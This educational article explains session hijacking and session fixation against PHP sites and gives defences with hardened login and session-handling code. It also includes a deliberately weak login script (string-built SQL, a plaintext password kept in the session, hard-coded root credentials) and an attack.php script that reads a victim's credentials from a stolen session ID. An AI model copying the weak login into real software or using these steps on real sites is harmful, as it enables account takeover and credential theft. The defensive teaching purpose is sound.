This article covers session hijacking against PHP web sites. Session hijacking is a comparatively involved attack, and most hosts on the Internet are exposed to it. The attack discussed here targets the application-layer session identifier (the PHP session ID) rather than the TCP connection itself, so any network on which that identifier can be observed or guessed, which includes almost every local area network, carries the risk.
The server and the client communicate through a session. When the client's browser connects to the server, the server creates a session for that user. Each user's session is independent and is maintained on the server. Each session is identified by a unique string called the session ID. On every request the browser sends this ID in an HTTP header (normally the Cookie header, or in the URL if the site passes it that way), and the server uses it to work out which user submitted the request.
The session stores per-user data. Many web applications use it to remember that the user has authenticated, and the example below goes as far as keeping the account name and password there so that later pages can re-check them. (Keeping the plaintext password in the session is poor practice: anyone who can read the session store, as the attack below shows, gets the password. Storing the user ID and a logged-in flag is enough.) The session's life cycle begins when the user connects to the server and ends when the application calls session_destroy(), for example on log-off, or when the user closes the browser and the session cookie is discarded. After a period of inactivity the server-side data becomes eligible for garbage collection; PHP's default session.gc_maxlifetime is 1440 seconds (24 minutes).
(Figure: application architecture for PHP session processing)
Session Hijacking
Session hijacking means that the attacker obtains the target user's session ID by some means. Once the session ID is obtained, the attacker can present it to the web site and act with the target user's identity and permissions, without ever knowing the password.
How the attacker obtains the target user session ID:
1) Brute force: try session IDs until one that belongs to a live session is found.
2) Calculation: if session IDs are generated in a predictable (non-random) way, the attacker can compute a valid one.
3) Stealing: obtain the ID by sniffing the network, by XSS (reading document.cookie), or by other means.
(Figure: attack steps for session hijacking)
Instance

login.php (uses the legacy mysql_* extension, removed in PHP 7, as in the original; the query building and the storage of the password in the session are kept as the article wrote them, because the attack below depends on them):

    <?php
    session_start();
    if (isset($_POST["login"]))
    {
        $link = mysql_connect("localhost", "root", "root")
            or die("Could not establish MySQL database connection: " . mysql_error());
        mysql_select_db("CMS") or die("Unable to select MySQL database");
        if (!get_magic_quotes_gpc())
        {
            $query = "SELECT * FROM member WHERE username='" . addslashes($_POST["username"]) .
                     "' AND password='" . addslashes($_POST["password"]) . "'";
        }
        else
        {
            $query = "SELECT * FROM member WHERE username='" . $_POST["username"] .
                     "' AND password='" . $_POST["password"] . "'";
        }
        $result = mysql_query($query)
            or die("Failed to execute MySQL query: " . mysql_error());
        $match_count = mysql_num_rows($result);
        if ($match_count)
        {
            // The example keeps the plaintext password in the session.
            $_SESSION["username"] = $_POST["username"];
            $_SESSION["password"] = $_POST["password"];
            $_SESSION["book"] = 1;
            mysql_free_result($result);
            mysql_close($link);
            header("Location: http://localhost/index.php?user=" . $_POST["username"]);
        }
    }
    ?>
    .....
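For comparison, here is a hardened counterpart to the login.php above. It is an added example and not the article's code: it assumes a member table with columns id, username and password_hash (the hash produced by password_hash()), PDO with the pdo_mysql driver, and placeholder DSN and credentials. It binds the username as data instead of quoting it, verifies a password hash instead of comparing plaintext, regenerates the session ID at the moment the privilege level changes, and stores only the identity in the session.

```php
<?php
// Hardened login.php (added example, not the article's own code).
// Assumptions: table member(id, username, password_hash), PDO/pdo_mysql,
// DSN and credentials are placeholders.
session_start();

if (isset($_POST["login"])) {
    $pdo = new PDO(
        "mysql:host=localhost;dbname=cms;charset=utf8mb4",
        "cms_app", "change-me",
        [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
         PDO::ATTR_EMULATE_PREPARES => false]
    );

    // Prepared statement: the username is sent as a bound parameter, so no
    // escaping (addslashes, magic quotes) is needed and none can go wrong.
    $stmt = $pdo->prepare(
        "SELECT id, username, password_hash FROM member WHERE username = ?"
    );
    $stmt->execute([$_POST["username"] ?? ""]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a dummy hash when the user does not exist, so the
    // response time does not reveal which usernames are valid.
    $hash = $row ? $row["password_hash"] : password_hash("dummy", PASSWORD_DEFAULT);
    $ok   = password_verify($_POST["password"] ?? "", $hash) && $row;

    if ($ok) {
        // Privilege level changes here: drop the pre-login session ID so a
        // fixated or previously captured ID is worthless from now on.
        session_regenerate_id(true);

        // Keep only what later pages need; never the password.
        $_SESSION["user_id"]   = (int) $row["id"];
        $_SESSION["username"]  = $row["username"];
        $_SESSION["book"]      = 1;
        $_SESSION["logged_in"] = true;

        // Do not echo the username into the redirect; later pages read it
        // from the session instead of from a user-controlled query string.
        header("Location: /index.php");
        exit;
    }
    $error = "Invalid username or password";
}
```

With this login, the attack.php shown later would still see $_SESSION["username"] if it ran on the same server with the same ID, but there is no password to harvest, and an ID captured before login no longer maps to the authenticated session.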
index.php:

    <?php
    // Open the session
    session_start();
    ?>
    The visitor's session ID is: <?php echo session_id(); ?><br />
    Visitor: <?php echo htmlspecialchars($_GET["user"], ENT_QUOTES); ?><br />
    Number of book items: <?php echo htmlspecialchars($_SESSION["book"], ENT_QUOTES); ?><br />

After a successful login the application uses
    $_SESSION["username"] to hold the account,
    $_SESSION["password"] to hold the password, and
    $_SESSION["book"] to hold the number of items purchased.
(Figure: display after login)
Start attacking
attack.php:

    <?php
    // Open the session: PHP attaches to whatever session ID the request carries
    session_start();
    echo "The target user's session ID is: " . session_id() . "<br />";
    echo "The target user's username is: " . $_SESSION["username"] . "<br />";
    echo "The target user's password is: " . $_SESSION["password"] . "<br />";
    // Set the number of books to 2000
    $_SESSION["book"] = 2000;
    ?>
Request http://localhost/attack.php?PHPSESSID=5a6kqe7cufhstuhcmhgr9nsg45, where the ID is the victim's session ID obtained earlier. (Passing the ID in the URL works only when session.use_only_cookies is off; otherwise the attacker sets it in the Cookie header instead.) attack.php prints the victim's username and password and overwrites the item count. When the victim then refreshes index.php, the number of items they have bought has become 2000.
Session fixation attack

Instead of stealing an ID, the attacker chooses one and gets the victim to use it, taking advantage of the fact that the site accepts a session ID supplied in the URL.

The attacker sends the link http://localhost/index.php?user=dodo&PHPSESSID=1234 to the user dodo. When dodo follows the link and logs in, PHP adopts the attacker-chosen ID 1234 for dodo's session. The attacker then requests http://localhost/attack.php?PHPSESSID=1234; when dodo refreshes the page, the number of goods has become 2000.
Precautionary approaches

1) Change the session ID periodically

bool session_regenerate_id([bool $delete_old_session = false])

When delete_old_session is true the old session file is deleted; when false (the default) the old session data is kept under the old ID, so a captured ID keeps working.

At the beginning of index.php, add

    session_start();
    session_regenerate_id(true);
    ......

This gives the visitor a new session ID on every page load, so an ID captured earlier stops working almost immediately. Regenerating on every request can break sites that issue concurrent requests (an AJAX call may still carry the just-deleted ID), so the usual practice is to regenerate whenever the privilege level changes, above all immediately after a successful login; that also defeats session fixation, because the attacker-chosen ID is discarded at login.
2) Change the name of the session

The default session name is PHPSESSID; it is used as the cookie name (and as the URL parameter name). An attacker who has not captured and analysed traffic cannot guess the name, which blocks some blind attacks. Note that session_name() must be called before session_start(), and that this is obscurity rather than a real control: the name appears in every Set-Cookie header.

    session_name("MySessionID");
    session_start();
    ......
3) Turn off the transparent session ID

The transparent session ID (trans_sid) is PHP's mechanism for rewriting links and forms to carry the session ID when the browser does not accept cookies; it puts the ID into URLs, where it leaks through logs, Referer headers and shoulder surfing. Disable it in php.ini:

    session.use_trans_sid = 0

or in code, before the session is started:

    ini_set("session.use_trans_sid", 0);
    session_start();
    ......
4) Only accept the session ID from the cookie

session.use_cookies = 1 means cookies are used to carry the session ID.
session.use_only_cookies = 1 means the session ID is accepted only from a cookie, never from the URL or a POST field, which removes the fixation vector shown above (the PHPSESSID=1234 link would be ignored).

In code, before the session is started:

    ini_set("session.use_cookies", 1);
    ini_set("session.use_only_cookies", 1);
    session_start();
5) Pass a hidden parameter in the URL

    session_start();
    $seid = md5(uniqid(rand(), true));
    $_SESSION["seid"] = $seid;

The value of $seid is generated on the server, stored in the session and appended to the links and forms the application itself emits. An attacker who has only the session ID does not know $seid, so checking that the seid submitted with a request matches $_SESSION["seid"] confirms that the page was reached through the web application's own links rather than by a request built from a stolen ID. The check helps only when the attacker has the ID but not the URLs (for example an ID read from document.cookie via XSS); if the ID was sniffed from traffic, the URLs carrying seid were sniffed with it.
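The following bootstrap include combines measures 1) to 5) above in one place, together with the seid check that 5) describes but does not show. It is an added example, not the article's code, and goes slightly beyond the article: it also sets session.use_strict_mode (PHP's direct defence against fixation, since it rejects IDs the server never issued) and the cookie flags that keep the ID away from document.cookie and plain HTTP. The function names session_boot, app_link and seid_ok and the 300-second regeneration interval are this example's own choices; the secret is generated with random_bytes() instead of md5(uniqid()); the secure cookie flag assumes the site is served over HTTPS.

```php
<?php
// session_boot.php: applies the article's five measures plus strict mode and
// cookie flags. Added example, not the article's code. Function names and
// the regeneration interval are this example's own choices.

function session_boot(): void
{
    // (3) and (4): never accept or emit the session ID anywhere but a cookie.
    ini_set("session.use_trans_sid", "0");
    ini_set("session.use_cookies", "1");
    ini_set("session.use_only_cookies", "1");
    // Reject session IDs the server never issued: the direct fix for fixation.
    ini_set("session.use_strict_mode", "1");
    // Keep the cookie out of document.cookie (XSS theft) and off plain HTTP.
    // Assumes the site is served over HTTPS.
    session_set_cookie_params([
        "lifetime" => 0,
        "path"     => "/",
        "secure"   => true,
        "httponly" => true,
        "samesite" => "Lax",
    ]);
    // (2): session_name() must precede session_start().
    session_name("MySessionID");
    session_start();

    // (1): regenerate on a schedule rather than on every request, so parallel
    // requests (AJAX, images) do not race on a just-deleted ID.
    $now = time();
    if (!isset($_SESSION["regenerated_at"]) || $now - $_SESSION["regenerated_at"] > 300) {
        session_regenerate_id(true);
        $_SESSION["regenerated_at"] = $now;
    }

    // (5): per-session secret that only the application's own links carry.
    if (!isset($_SESSION["seid"])) {
        $_SESSION["seid"] = bin2hex(random_bytes(16)); // CSPRNG, not md5(uniqid())
    }
}

// Build a link the application itself emits; only such links carry seid.
function app_link(string $path): string
{
    return $path . "?seid=" . urlencode($_SESSION["seid"]);
}

// The check for measure (5): a request that reaches a protected page without
// a seid matching the one in the session did not come through the application.
function seid_ok(): bool
{
    $given = $_GET["seid"] ?? "";
    return is_string($given)
        && isset($_SESSION["seid"])
        && hash_equals($_SESSION["seid"], $given);
}

// Usage in a protected page (e.g. index.php after login):
//   require "session_boot.php";
//   session_boot();
//   if (!seid_ok()) { http_response_code(403); exit("Bad or missing seid"); }
//   echo '<a href="' . htmlspecialchars(app_link("/cart.php"), ENT_QUOTES) . '">Cart</a>';
```

The entry pages (the login form and the first page after login) call session_boot() but not seid_ok(), since a visitor arriving from outside has no seid yet; every page reached from them through app_link() performs the check. Because use_only_cookies is on, the seid in the URL is an ordinary application parameter and is never mistaken for a session ID.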